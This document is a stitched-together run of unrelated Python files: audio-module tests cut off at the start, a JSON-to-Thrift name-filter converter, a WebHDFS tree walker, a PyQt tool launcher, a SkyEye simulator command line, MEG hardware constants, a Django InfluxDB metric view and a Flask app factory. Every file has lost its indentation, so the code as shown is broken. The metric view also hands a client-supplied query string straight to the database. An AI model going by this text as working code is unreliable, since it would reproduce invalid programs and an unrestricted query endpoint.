ba[2::3] = data[::3]
return bytes(ba)
def byteswap4(data):
a = array.array('i')
a.fromstring(data)
a.byteswap()
return a.tostring()
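# Hedged illustration of the helpers above: each byteswapN reverses the byte
# order of every N-byte sample. The byte strings below are illustrative.
def _example_byteswap():
    assert byteswap2(b'\x01\x02') == b'\x02\x01'
    assert byteswap3(b'\x01\x02\x03') == b'\x03\x02\x01'
    assert byteswap4(b'\x01\x02\x03\x04') == b'\x04\x03\x02\x01'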
class AudioTests:
close_fd = False
def setUp(self):
self.f = self.fout = None
def tearDown(self):
if self.f is not None:
self.f.close()
if self.fout is not None:
self.fout.close()
unlink(TESTFN)
def check_params(self, f, nchannels, sampwidth, framerate, nframes,
comptype, compname):
self.assertEqual(f.getnchannels(), nchannels)
self.assertEqual(f.getsampwidth(), sampwidth)
self.assertEqual(f.getframerate(), framerate)
self.assertEqual(f.getnframes(), nframes)
self.assertEqual(f.getcomptype(), comptype)
self.assertEqual(f.getcompname(), compname)
params = f.getparams()
self.assertEqual(params,
(nchannels, sampwidth, framerate, nframes, comptype, compname))
dump = pickle.dumps(params)
self.assertEqual(pickle.loads(dump), params)
class AudioWriteTests(AudioTests):
def create_file(self, testfile):
f = self.fout = self.module.open(testfile, 'wb')
f.setnchannels(self.nchannels)
f.setsampwidth(self.sampwidth)
f.setframerate(self.framerate)
f.setcomptype(self.comptype, self.compname)
return f
def check_file(self, testfile, nframes, frames):
f = self.module.open(testfile, 'rb')
try:
self.assertEqual(f.getnchannels(), self.nchannels)
self.assertEqual(f.getsampwidth(), self.sampwidth)
self.assertEqual(f.getframerate(), self.framerate)
self.assertEqual(f.getnframes(), nframes)
self.assertEqual(f.readframes(nframes), frames)
finally:
f.close()
def test_write_params(self):
f = self.create_file(TESTFN)
f.setnframes(self.nframes)
f.writeframes(self.frames)
self.check_params(f, self.nchannels, self.sampwidth, self.framerate,
self.nframes, self.comptype, self.compname)
f.close()
def test_write(self):
f = self.create_file(TESTFN)
f.setnframes(self.nframes)
f.writeframes(self.frames)
f.close()
self.check_file(TESTFN, self.nframes, self.frames)
def test_incompleted_write(self):
with open(TESTFN, 'wb') as testfile:
testfile.write(b'ababagalamaga')
f = self.create_file(testfile)
f.setnframes(self.nframes + 1)
f.writeframes(self.frames)
f.close()
with open(TESTFN, 'rb') as testfile:
self.assertEqual(testfile.read(13), b'ababagalamaga')
self.check_file(testfile, self.nframes, self.frames)
def test_multiple_writes(self):
with open(TESTFN, 'wb') as testfile:
testfile.write(b'ababagalamaga')
f = self.create_file(testfile)
f.setnframes(self.nframes)
framesize = self.nchannels * self.sampwidth
f.writeframes(self.frames[:-framesize])
f.writeframes(self.frames[-framesize:])
f.close()
with open(TESTFN, 'rb') as testfile:
self.assertEqual(testfile.read(13), b'ababagalamaga')
self.check_file(testfile, self.nframes, self.frames)
def test_overflowed_write(self):
with open(TESTFN, 'wb') as testfile:
testfile.write(b'ababagalamaga')
f = self.create_file(testfile)
f.setnframes(self.nframes - 1)
f.writeframes(self.frames)
f.close()
with open(TESTFN, 'rb') as testfile:
self.assertEqual(testfile.read(13), b'ababagalamaga')
self.check_file(testfile, self.nframes, self.frames)
def test_unseekable_read(self):
f = self.create_file(TESTFN)
f.setnframes(self.nframes)
f.writeframes(self.frames)
f.close()
with UnseekableIO(TESTFN, 'rb') as testfile:
self.check_file(testfile, self.nframes, self.frames)
def test_unseekable_write(self):
with UnseekableIO(TESTFN, 'wb') as testfile:
f = self.create_file(testfile)
f.setnframes(self.nframes)
f.writeframes(self.frames)
f.close()
self.fout = None
self.check_file(TESTFN, self.nframes, self.frames)
def test_unseekable_incompleted_write(self):
with UnseekableIO(TESTFN, 'wb') as testfile:
testfile.write(b'ababagalamaga')
f = self.create_file(testfile)
f.setnframes(self.nframes + 1)
try:
f.writeframes(self.frames)
except IOError:
pass
try:
f.close()
except IOError:
pass
with open(TESTFN, 'rb') as testfile:
self.assertEqual(testfile.read(13), b'ababagalamaga')
self.check_file(testfile, self.nframes + 1, self.frames)
def test_unseekable_overflowed_write(self):
with UnseekableIO(TESTFN, 'wb') as testfile:
testfile.write(b'ababagalamaga')
f = self.create_file(testfile)
f.setnframes(self.nframes - 1)
try:
f.writeframes(self.frames)
except IOError:
pass
try:
f.close()
except IOError:
pass
with open(TESTFN, 'rb') as testfile:
self.assertEqual(testfile.read(13), b'ababagalamaga')
framesize = self.nchannels * self.sampwidth
self.check_file(testfile, self.nframes - 1, self.frames[:-framesize])
class AudioTestsWithSourceFile(AudioTests):
@classmethod
def setUpClass(cls):
cls.sndfilepath = findfile(cls.sndfilename, subdir='audiodata')
def test_read_params(self):
f = self.f = self.module.open(self.sndfilepath)
#self.assertEqual(f.getfp().name, self.sndfilepath)
self.check_params(f, self.nchannels, self.sampwidth, self.framerate,
self.sndfilenframes, self.comptype, self.compname)
def test_close(self):
with open(self.sndfilepath, 'rb') as testfile:
f = self.f = self.module.open(testfile)
self.assertFalse(testfile.closed)
f.close()
self.assertEqual(testfile.closed, self.close_fd)
with open(TESTFN, 'wb') as testfile:
fout = self.fout = self.module.open(testfile, 'wb')
self.assertFalse(testfile.closed)
with self.assertRaises(self.module.Error):
fout.close()
self.assertEqual(testfile.closed, self.close_fd)
fout.close() # do nothing
def test_read(self):
framesize = self.nchannels * self.sampwidth
chunk1 = self.frames[:2 * framesize]
chunk2 = self.frames[2 * framesize: 4 * framesize]
f = self.f = self.module.open(self.sndfilepath)
self.assertEqual(f.readframes(0), b'')
self.assertEqual(f.tell(), 0)
self.assertEqual(f.readframes(2), chunk1)
f.rewind()
pos0 = f.tell()
self.assertEqual(pos0, 0)
self.assertEqual(f.readframes(2), chunk1)
pos2 = f.tell()
self.assertEqual(pos2, 2)
self.assertEqual(f.readframes(2), chunk2)
f.setpos(pos2)
self.assertEqual(f.readframes(2), chunk2)
f.setpos(pos0)
self.assertEqual(f.readframes(2), chunk1)
with self.assertRaises(self.module.Error):
f.setpos(-1)
with self.assertRaises(self.module.Error):
f.setpos(f.getnframes() + 1)
def test_copy(self):
f = self.f = self.module.open(self.sndfilepath)
fout = self.fout = self.module.open(TESTFN, 'wb')
fout.setparams(f.getparams())
i = 0
n = f.getnframes()
while n > 0:
i += 1
fout.writeframes(f.readframes(i))
n -= i
fout.close()
fout = self.fout = self.module.open(TESTFN, 'rb')
f.rewind()
self.assertEqual(f.getparams(), fout.getparams())
self.assertEqual(f.readframes(f.getnframes()),
fout.readframes(fout.getnframes()))
def test_read_not_from_start(self):
with open(TESTFN, 'wb') as testfile:
testfile.write(b'ababagalamaga')
with open(self.sndfilepath, 'rb') as f:
testfile.write(f.read())
with open(TESTFN, 'rb') as testfile:
self.assertEqual(testfile.read(13), b'ababagalamaga')
f = self.module.open(testfile, 'rb')
try:
self.assertEqual(f.getnchannels(), self.nchannels)
self.assertEqual(f.getsampwidth(), self.sampwidth)
self.assertEqual(f.getframerate(), self.framerate)
self.assertEqual(f.getnframes(), self.sndfilenframes)
self.assertEqual(f.readframes(self.nframes), self.frames)
finally:
f.close()
|
'''
Constructs a new FilterNames instance from JSON.
'''
import os
import sys
import json
from _filter import Filter
from ttypes import FilterNames
def log(m):
sys.stderr.write(m)
sys.stderr.write('\n')
sys.stderr.flush()
def convert_utf8(dict_of_unicode):
_new_dict = dict()
for key, values in dict_of_unicode.items():
_new_dict[key.encode('utf8')] = [val.encode('utf8') for val in values]
return _new_dict
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('input', nargs='?', help='path to JSON file that is either name-->[target_id, ...], or target_id-->[name, ...], defaults to stdin')
parser.add_argument('--target-id-to-names', default=False, action='store_true',
help='pass this flag if input JSON file has target_id string as the primary key')
parser.add_argument('output', nargs='?', default=None, help='path to output file for large thrift message, defaults to stdout.')
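    # Illustrative input shapes (the names/ids below are made up, not taken
    # from the original project):
    #   default layout:             {"Some Name": ["target-1", "target-2"]}
    #   with --target-id-to-names:  {"target-1": ["Some Name", "An Alias"]}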
args = parser.parse_args()
filter = Filter()
if args.input:
i_fh = open(args.input)
else:
i_fh = sys.stdin
    log('loading %s' % (args.input or 'stdin'))
if args.target_id_to_names:
unicode_target_id_to_names = json.load(i_fh)
log('%d target_ids loaded' % len(unicode_target_id_to_names))
        utf8_target_id_to_names = convert_utf8(unicode_target_id_to_names)
filter_names = FilterNames(target_id_to_names=utf8_target_id_to_names)
        ## reach under the hood and act like we called load_filter_names
        ## instead of building it from JSON like we did above
filter.filter_names = filter_names
filter.invert_filter_names()
else:
unicode_name_to_target_ids = json.load(i_fh)
target_ids = set()
for target_ids_list in unicode_name_to_target_ids.values():
target_ids.update(target_ids_list)
log('%d names, %d target_ids loaded' % (len(unicode_name_to_target_ids), len(target_ids)))
utf8_name_to_target_ids = convert_utf8(unicode_name_to_target_ids)
filter_names = FilterNames(name_to_target_ids=utf8_name_to_target_ids)
        ## reach under the hood and act like we called load_filter_names
        ## instead of building it from JSON like we did above
filter.filter_names = filter_names
if args.output:
o_fh = open(args.output, mode='wb')
else:
o_fh = sys.stdout
filter.save_filter_names(file_obj=o_fh)
log('flushing to %s' % (args.output or 'stdout'))
o_fh.close()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import urllib2
import json
class Tools(object):
@staticmethod
def get_active(nn_urls):
nn = nn_urls
if "," in nn:
nn = nn.split(",")
else:
url = 'http://' + nn
return url
for u in nn:
url = 'http://' + u
check_url = url + '/jmx?qry=Hadoop:service=NameNode,name=NameNodeStatus'
try:
res = json.load(urllib2.urlopen(check_url))
if res['beans'][0]['State'] == 'active':
return url
            except Exception:
continue
@staticmethod
def hdfs_status(nn, path, user='hdfs'):
url = nn + '/webhdfs/v1' + path + '?op=LISTSTATUS' + '&user.name=' + user
raw = urllib2.urlopen(url)
res = json.loads(raw.read())
return res[u'FileStatuses'][u'FileStatus']
class Base(object):
def __init__(self, nn_urls, hdfs_path, local_path, action='sync', user='hdfs'):
self.nn_urls = nn_urls
self.action = action
self.hdfs_path = hdfs_path
self.local_path = local_path
self.user = user
def start(self):
if self.action == 'sync':
self.route(self.hdfs_path)
def route(self, _path):
url = Tools.get_active(self.nn_urls) + '/webhdfs/v1' + _path + '?op=LISTSTATUS' + '&user.name=' + self.user
res = json.load(urllib2.urlopen(url))
for d in res[u'FileStatuses'][u'FileStatus']:
_now_path = "%s%s" % (_path, d['pathSuffix'])
if d['type'] == 'FILE':
print "%s" % _now_path
elif d['type'] == 'DIRECTORY':
print "%s/" % _now_path
self.route(_now_path + '/')
if __name__ == '__main__':
instance = Base(nn_urls='10.123.59.17:50070,10.123.72.244:50070', hdfs_path=sys.argv[1], local_path=sys.argv[2])
instance.start()
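# Usage sketch (the script name and paths below are illustrative only):
#   python webhdfs_walk.py /user/logs/ /tmp/local_mirror
# argv[1] is the HDFS path to walk, argv[2] a local path that the code above
# stores but does not yet use; the default 'sync' action just prints the tree.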
|
#!/usr/bin/env python2.7
#The MIT License (MIT)
#Copyright (c) 2015-2016 mh4x0f P0cL4bs Team
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from sys import argv,exit
from os import getuid
from PyQt4.QtGui import QApplication,QIcon
from Core.Privilege import frm_privelege
from Core.Main import Initialize
from Core.check import check_dependencies
if __name__ == '__main__':
if not getuid() == 0:
app2 = QApplication(argv)
priv = frm_privelege()
priv.setWindowIcon(QIcon('rsc/icon.ico'))
priv.show()
exit(app2.exec_())
else:
check_dependencies()
root = QApplication(argv)
app = Initialize(None)
app.setWindowIcon(QIcon('rsc/icon.ico'))
app.center()
app.show()
exit(root.exec_())
|
import cmd, sys
import skyeye_lib_path
from skyeye_module import *
def help_info_open():
print "help info:"
print "==========================================================="
def help_info_close():
print "==========================================================="
class SkyEyeCli(cmd.Cmd):
################Start cli init #############################
# Set the skyeye prompt
prompt = "(skyeye) "
####### Check status to change prompt ########
def postcmd(self, stop, line):
if libcommon.SIM_is_running() == True:
self.prompt = "(running) "
else:
self.prompt = "(skyeye) "
return stop
def default(self, line):
self.stdout.write('*** Unknown command: %s\n'%line)
self.stdout.write("*** Get commands with 'help' cmd\n")
file = None
def do_help(self, arg):
if arg:
# XXX check arg syntax
try:
func = getattr(self, 'help_' + arg)
except AttributeError:
try:
doc=getattr(self, 'do_' + arg).__doc__
if doc:
self.stdout.write("%s\n"%str(doc))
return
except AttributeError:
pass
self.stdout.write("%s\n"%str(self.nohelp % (arg,)))
return
func()
else:
names = self.get_names()
cmds_doc = []
cmds_undoc = []
help = {}
for name in names:
if name[:5] == 'help_':
help[name[5:]]=1
names.sort()
# There can be duplicates if routines overridden
prevname = ''
for name in names:
if name[:3] == 'do_':
if name == prevname:
continue
prevname = name
cmd=name[3:]
cmd = cmd.replace("_", "-")
if cmd in help:
cmds_doc.append(cmd)
del help[cmd]
elif getattr(self, name).__doc__:
cmds_doc.append(cmd)
else:
cmds_undoc.append(cmd)
# self.stdout.write("%s\n"%str(self.doc_leader))
# self.print_topics(self.doc_header, cmds_doc, 15,80)
# self.print_topics(self.misc_header, help.keys(),15,80)
# self.print_topics(self.undoc_header, cmds_undoc, 15,80)
self.print_topics("\nSkyEye command list", cmds_undoc, 15,80)
def complete(self, text, state):
if state == 0:
import readline
origline = readline.get_line_buffer()
line = origline.lstrip()
stripped = len(origline) - len(line)
begidx = readline.get_begidx() - stripped
endidx = readline.get_endidx() - stripped
if begidx>0:
cmd, args, foo = self.parseline(line)
if cmd == '':
compfunc = self.completedefault
else:
try:
compfunc = getattr(self, 'complete_' + cmd)
except AttributeError:
compfunc = self.completedefault
else:
compfunc = self.completenames
self.completion_matches = compfunc(text, line, begidx, endidx)
try:
return self.completion_matches[state]
except IndexError:
return None
def completenames(self, text, *ignored):
dotext = 'do_'+text
string = [a[3:] for a in self.get_names() if a.startswith(dotext)]
for index in range(len(string)):
string[index] = string[index].replace("_", "-")
return string
def onecmd(self, line):
line = line.replace("-", "_")
cmd, arg, line = self.parseline(line)
if not line:
return self.emptyline()
if cmd is None:
return self.default(line)
self.lastcmd = line
if cmd == '':
return self.default(line)
else:
try:
func = getattr(self, 'do_' + cmd)
except AttributeError:
return self.default(line)
return func(arg)
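    # Note (added): completenames() shows do_* commands with dashes and
    # onecmd() maps the dashes back to underscores, so typing "list-modules"
    # at the prompt dispatches to do_list_modules(arg).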
################ End cli init #############################
################ BEGIN COMMANDS DEFS#############################
####list-module list-options, list-machines, list-bp ####
def do_list_modules(self, arg):
# print "In do_list_modules"
libcommon.com_list_modules(arg)
def do_list_options(self, arg):
# print "In do_list_options"
libcommon.com_list_options(arg)
def do_list_machines(self, arg):
# print "In do_list_machines"
libcommon.com_list_machines(arg)
def do_list_bp(self, arg):
# print "In do_list_bp"
libcommon.com_list_bp(arg)
def help_list_modules(self):
help_info_open()
print "list-modules : List all the loaded module."
help_info_close()
def help_list_options(self):
help_info_open()
print "list-options : List all the available options for SkyEye."
help_info_close()
def help_list_machines(self):
help_info_open()
print "list-machines : List all the supported machines for SkyEye."
help_info_close()
def help_list_bp(self):
help_info_open()
print "list-bp : List all the breakpoint."
help_info_close()
####list-module list-options, list-machines, list-bp ####
########## show-pref, show-map, show-step ###############
def do_show_pref(self, arg):
# print "In do_show_pref"
libcommon.com_show_pref(arg)
def do_show_map(self, arg):
# print "In do_show_map"
libcommon.com_show_map(arg)
def do_show_step(self, arg):
# print "In do_show_step"
libcommon.com_show_step(arg)
def help_show_pref(self):
help_info_open()
print "show-pref : Show the current preference for SkyEye."
help_info_close()
def help_show_map(self):
help_info_open()
print "show-map : Show the current memory map for the machine."
help_info_close()
def help_show_step(self):
help_info_open()
print "show-step : Show the steps of current processor."
help_info_close()
########## show-pref, show-map, show-step ###############
############# cov-state, cov-off, cov-on ################
def do_cov_state(self, arg):
# print "In do_cov_state"
libcodecov.cov_state_show(arg)
def do_cov_off(self, arg):
# print "In do_cov_off"
libcodecov.cov_state_off(arg)
def do_cov_on(self, arg):
# print "In do_cov_on"
libcodecov.cov_state_on(arg)
def help_cov_state(self):
help_info_open()
print "cov-state : show code coverage state."
help_info_close()
def help_cov_off(self):
help_info_open()
print "cov-off : turn off code coverage switch."
help_info_close()
def help_cov_on(self):
help_info_open()
print "cov-on : turn on code coverage switch."
help_info_close()
############# cov-state, cov-off, cov-on ################
################## load-conf ##########################
def do_load_conf(self, arg):
# print "In do_load_conf"
libcommon.com_load_conf(arg)
def help_load_conf(self):
help_info_open()
print "load-conf : load a config file and parse it for SkyEye."
help_info_close()
################## load-conf ##########################
################### delete-bp ##########################
def do_delete_bp(self, arg):
# print "In do_delete_bp"
libcommon.com_delete_bp(arg)
def help_delete_bp(self):
help_info_open()
print "delete-bp : Delete some breakpoint."
help_info_close()
################### delete-bp ##########################
#################### log-bus ##########################
def do_log_bus(self, arg):
# print "In do_log_bus"
libbus_log.com_log_bus(arg)
def help_log_bus(self):
help_info_open()
print "log-bus : record every bus access to log file."
help_info_close()
#################### log-bus ##########################
#################### remote-gdb ########################
def do_remote_gdb(self, arg):
# print "In do_remote_gdb"
        libgdbserver.com_remote_gdb(arg)
def help_remote_gdb(self):
help_info_open()
print "remote-gdb : Open remote gdb debugger."
help_info_close()
#################### remote-gdb ########################
#################### other COMMANDS ####################
def do_ls(self, arg):
# print "outline ls"
libcommon.com_list(arg)
def do_quit(self, arg):
# print "outline quit"
libcommon.com_quit(arg)
do_q = do_quit
def do_run(self, arg):
# print "outline run"
libcommon.com_run(arg)
def do_stop(self, arg):
# print "outline stop"
libcommon.com_stop(arg)
def do_continue(self, arg):
# print "outline continue"
libcommon.com_cont(arg)
def do_stepi(self, arg):
# print "outline stepi"
libcommon.com_si(arg)
def do_start(self, arg):
# print "outline start"
libcommon.com_start(arg)
def do_info(self, arg):
# print "outline info"
libcommon.com_info(arg)
def do_x(self, arg):
# print "outline x"
libcommon.com_x(arg)
def do_pmon(self, arg):
# print "outline pmon"
libpmon.com_pmon(arg)
def do_create_uart_16550(self, arg):
# print "outline create_uart_16550"
        libuart_16550.com_create_16550(arg)
def do_disassemble(self, arg):
# print "outline disassemble"
libdisasm.com_disassemble(arg)
def do_break(self, arg):
# print "outline do_break"
libcommon.com_break(arg)
def help_ls(self):
help_info_open()
print "ls : Synonym for `list'"
help_info_close()
def help_quit(self):
help_info_open()
print "quit : Quit SkyEye "
help_info_close()
def help_q(self):
help_info_open()
print "q : Quit SkyEye "
help_info_close()
def help_run(self):
help_info_open()
print "run : Start the simulator."
help_info_close()
def help_stop(self):
help_info_open()
print "stop : Stop the running of simulator."
help_info_close()
def help_continue(self):
help_info_open()
print "continue : Continue the running of interrupted simulator."
help_info_close()
def help_stepi(self):
help_info_open()
print "stepi : step into ."
help_info_close()
def help_start(self):
help_info_open()
print "start : start simulator."
help_info_close()
def help_info(self):
help_info_open()
print "info : show information for various objects. "
help_info_close()
def help_x(self):
help_info_open()
print "x : display memory value at the address. "
help_info_close()
def help_pmon(self):
help_info_open()
print "pmon : enable the performance monitor."
help_info_close()
def help_create_uart_16550(self):
help_info_open()
print "create_uart_16550 : Create a new uart of 16550 type."
help_info_close()
def help_disassemble(self):
help_info_open()
print "disassemble : Disassemble the given address."
help_info_close()
def help_break(self):
help_info_open()
print "break : disassemble : set breakpoint for an address."
help_info_close()
#################### other COMMANDS ####################
##### End with Class SkyEye #####
|
"""KIT constants"""
# Author: Teon Brooks <[email protected]>
#
# License: BSD (3-clause)
from ..constants import Bunch
KIT = Bunch()
# byte values
KIT.SHORT = 2
KIT.INT = 4
KIT.DOUBLE = 8
KIT.STRING = 128
# pointer locations
KIT.AMPLIFIER_INFO = 112
KIT.BASIC_INFO = 16
KIT.CHAN_SENS = 80
KIT.RAW_OFFSET = 144
KIT.AVE_OFFSET = 160
KIT.SAMPLE_INFO = 128
KIT.MRK_INFO = 192
KIT.CHAN_LOC_OFFSET = 64
# parameters
KIT.VOLTAGE_RANGE = 5.
KIT.CALIB_FACTOR = 1.0 # mne_manual p.272
KIT.RANGE = 1. # mne_manual p.272
KIT.UNIT_MUL = 0 # default is 0 mne_manual p.273
# gain: 0:x1, 1:x2, 2:x5, 3:x10, 4:x20, 5:x50, 6:x100, 7:x200
KIT.GAINS = [1, 2, 5, 10, 20, 50, 100, 200]
# BEF options: 0:THROUGH, 1:50Hz, 2:60Hz, 3:50Hz
KIT.BEFS = [0, 50, 60, 50]
# coreg constants
KIT.DIG_POINTS = 10000
# create system specific dicts
KIT_NY = Bunch(**KIT)
KIT_AD = Bunch(**KIT)
# NY-system channel information
KIT_NY.NCHAN = 192
KIT_NY.NMEGCHAN = 157
KIT_NY.NREFCHAN = 3
KIT_NY.NMISCCHAN = 32
KIT_NY.N_SENS = KIT_NY.NMEGCHAN + KIT_NY.NREFCHAN
# 12-bit A-to-D converter, one bit for signed integer. range +/- 2048
KIT_NY.DYNAMIC_RANGE = 2 ** 11
# amplifier information
KIT_NY.GAIN1_BIT = 11 # stored in Bit 11-12
KIT_NY.GAIN1_MASK = 2 ** 11 + 2 ** 12
KIT_NY.GAIN2_BIT = 0 # stored in Bit 0-2
KIT_NY.GAIN2_MASK = 2 ** 0 + 2 ** 1 + 2 ** 2 # (0x0007)
KIT_NY.GAIN3_BIT = None
KIT_NY.GAIN3_MASK = None
KIT_NY.HPF_BIT = 4 # stored in Bit 4-5
KIT_NY.HPF_MASK = 2 ** 4 + 2 ** 5
KIT_NY.LPF_BIT = 8 # stored in Bit 8-10
KIT_NY.LPF_MASK = 2 ** 8 + 2 ** 9 + 2 ** 10
KIT_NY.BEF_BIT = 14 # stored in Bit 14-15
KIT_NY.BEF_MASK = 2 ** 14 + 2 ** 15
# HPF options: 0:0, 1:1, 2:3
KIT_NY.HPFS = [0, 1, 3]
# LPF options: 0:10Hz, 1:20Hz, 2:50Hz, 3:100Hz, 4:200Hz, 5:500Hz,
# 6:1,000Hz, 7:2,000Hz
KIT_NY.LPFS = [10, 20, 50, 100, 200, 500, 1000, 2000]
# Maryland-system channel information
# Virtually the same as the NY-system except new ADC circa July 2014
# 16-bit A-to-D converter, one bit for signed integer. range +/- 32768
KIT_MD = Bunch(**KIT_NY)
KIT_MD.DYNAMIC_RANGE = 2 ** 15
# AD-system channel information
KIT_AD.NCHAN = 256
KIT_AD.NMEGCHAN = 208
KIT_AD.NREFCHAN = 16
KIT_AD.NMISCCHAN = 32
KIT_AD.N_SENS = KIT_AD.NMEGCHAN + KIT_AD.NREFCHAN
# 16-bit A-to-D converter, one bit for signed integer. range +/- 32768
KIT_AD.DYNAMIC_RANGE = 2 ** 15
# amplifier information
KIT_AD.GAIN1_BIT = 12 # stored in Bit 12-14
KIT_AD.GAIN1_MASK = 2 ** 12 + 2 ** 13 + 2 ** 14
KIT_AD.GAIN2_BIT = 28 # stored in Bit 28-30
KIT_AD.GAIN2_MASK = 2 ** 28 + 2 ** 29 + 2 ** 30
KIT_AD.GAIN3_BIT = 24 # stored in Bit 24-26
KIT_AD.GAIN3_MASK = 2 ** 24 + 2 ** 25 + 2 ** 26
KIT_AD.HPF_BIT = 8 # stored in Bit 8-10
KIT_AD.HPF_MASK = 2 ** 8 + 2 ** 9 + 2 ** 10
KIT_AD.LPF_BIT = 16 # stored in Bit 16-18
KIT_AD.LPF_MASK = 2 ** 16 + 2 ** 17 + 2 ** 18
KIT_AD.BEF_BIT = 0 # stored in Bit 0-1
KIT_AD.BEF_MASK = 2 ** 0 + 2 ** 1
# HPF options: 0:0Hz, 1:0.03Hz, 2:0.1Hz, 3:0.3Hz, 4:1Hz, 5:3Hz, 6:10Hz, 7:30Hz
KIT_AD.HPFS = [0, 0.03, 0.1, 0.3, 1, 3, 10, 30]
# LPF options: 0:10Hz, 1:20Hz, 2:50Hz, 3:100Hz, 4:200Hz, 5:500Hz,
# 6:1,000Hz, 7:10,000Hz
KIT_AD.LPFS = [10, 20, 50, 100, 200, 500, 1000, 10000]
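# Sketch (assumption, not defined in this file): readers of the SQD amplifier
# info are expected to decode each setting with the *_BIT/*_MASK pairs and use
# the result as an index into the option lists, e.g.
#   gain1 = KIT_AD.GAINS[(amp_info & KIT_AD.GAIN1_MASK) >> KIT_AD.GAIN1_BIT]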
# KIT recording system is encoded in the SQD file as integer:
KIT_CONSTANTS = {32: KIT_NY, # NYU-NY, July 7, 2008 -
33: KIT_NY, # NYU-NY, January 24, 2009 -
34: KIT_NY, # NYU-NY, January 22, 2010 -
# 440 NYU-AD, initial launch May 20, 2011 -
441: KIT_AD, # NYU-AD more channels July 11, 2012 -
442: KIT_AD, # NYU-AD move to NYUAD campus Nov 20, 2014 -
51: KIT_NY, # UMD
52: KIT_MD, # UMD update to 16 bit ADC, July 4, 2014 -
53: KIT_MD} # UMD December 4, 2014 -
SYSNAMES = {33: 'NYU 160ch System since Jan24 2009',
34: 'NYU 160ch System since Jan24 2009',
441: "New York University Abu Dhabi",
442: "New York University Abu Dhabi"}
|
from django.shortcuts import get_object_or_404
from rest_framework.decorators import api_view
from rest_framework.response import Response
from influxdb.client import InfluxDBClientError
from .models import Metric
@api_view(('GET', 'POST'))
def metric_details(request, pk, format=None):
"""
Get or write metric values
"""
metric = get_object_or_404(Metric, pk=pk)
# get
if request.method == 'GET':
try:
results = metric.select(q=request.query_params.get('q', metric.query))
except InfluxDBClientError as e:
return Response({'detail': e.content}, status=e.code)
return Response(list(results.get_points(metric.name)))
# post
else:
if not request.data:
return Response({'detail': 'expected values in POST data or JSON payload'},
status=400)
data = request.data.copy()
# try converting strings to floats when sending form-data
if request.content_type != 'application/json':
for key, value in data.items():
try:
data[key] = float(value) if '.' in value else int(value)
except ValueError:
pass
# write
metric.write(data)
return Response({'detail': 'ok'})
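# Example interaction (sketch; the URL pattern and values are illustrative):
#   GET  /metrics/1/?q=SELECT+*+FROM+cpu  -> JSON list of points for the metric
#   POST /metrics/1/  with  value=42.5    -> {"detail": "ok"}
# Non-JSON POST values are coerced to int/float where possible before writing.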
|
from flask import Flask
from flask.ext.pymongo import PyMongo
import os
import ConfigParser
import logging
import logging.config
from logging.handlers import RotatingFileHandler
from utils.utils import Utils
# Create MongoDB database object.
mongo = PyMongo()
# Create utils instance.
utils = Utils()
def create_app():
''' Create the Flask app.
'''
# Create the Flask app.
app = Flask(__name__)
# Load application configurations
load_config(app)
# Configure logging.
configure_logging(app)
# Register URL rules.
register_url_rules(app)
# Init app for use with this PyMongo
# http://flask-pymongo.readthedocs.org/en/latest/#flask_pymongo.PyMongo.init_app
mongo.init_app(app, config_prefix='MONGO')
return app
def load_config(app):
''' Reads the config file and loads configuration properties into the Flask app.
:param app: The Flask app object.
'''
# Get the path to the application directory, that's where the config file resides.
par_dir = os.path.join(__file__, os.pardir)
par_dir_abs_path = os.path.abspath(par_dir)
app_dir = os.path.dirname(par_dir_abs_path)
# Read config file
# FIXME: Use the "common pattern" described in "Configuring from Files": http://flask.pocoo.org/docs/config/
config = ConfigParser.RawConfigParser()
config_filepath = app_dir + '/config.cfg'
config.read(config_filepath)
# Set up config properties
app.config['SERVER_PORT'] = config.get('Application', 'SERVER_PORT')
app.config['BASE_PATH'] = config.get('Application', 'BASE_PATH')
# Set up MongoDB DB Name
app.config['MONGO_DBNAME'] = config.get('Mongo', 'DB_NAME')
# Logging path might be relative or starts from the root.
# If it's relative then be sure to prepend the path with the application's root directory path.
log_path = config.get('Logging', 'PATH')
if log_path.startswith('/'):
app.config['LOG_PATH'] = log_path
else:
app.config['LOG_PATH'] = app_dir + '/' + log_path
app.config['LOG_LEVEL'] = config.get('Logging', 'LEVEL').upper()
def configure_logging(app):
# Get the path of the log from the config
log_path = app.config['LOG_PATH']
# Get the level of logging from the config
log_level = app.config['LOG_LEVEL']
# If path directory doesn't exist, create it.
log_dir = os.path.dirname(log_path)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
# Create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# Create Log_Handler
log_handler = RotatingFileHandler(log_path, maxBytes=250000, backupCount=5)
# add formatter to log handler
log_handler.setFormatter(formatter)
# Get the level of the Debug and set it to the logger
app.logger.setLevel(log_level)
# Add the handlers to the logger
app.logger.addHandler(log_handler)
# Test if the logging is working by typing this string to a file.
app.logger.info('Logging to: %s', log_path)
# Views for json responses
from views.index import Index
from views.surveyeedistribution import SurveyeeDistribution
from views.groupedanswers import GroupedAnswers
from views.corruptiontype import CorruptionType
def register_url_rules(app):
''' Register URLs
:param app: The Flask application instance.
'''
# Show instructional index page.
app.add_url_rule(
'/',
view_func=Index.as_view('index'))
app.add_url_rule(
'/surveyee/distribution/<string:group>',
view_func=SurveyeeDistribution.as_view('json_surveyeedistribution'))
app.add_url_rule(
'/question/<int:qid>/group/<string:group>',
view_func=GroupedAnswers.as_view('json_groupedanswers'))
app.add_url_rule(
'/question/<int:qid>/group/<string:group>/disaggregate/<string:disaggregate>',
view_func=GroupedAnswers.as_view('json_disaggregated_groupedanswers'))
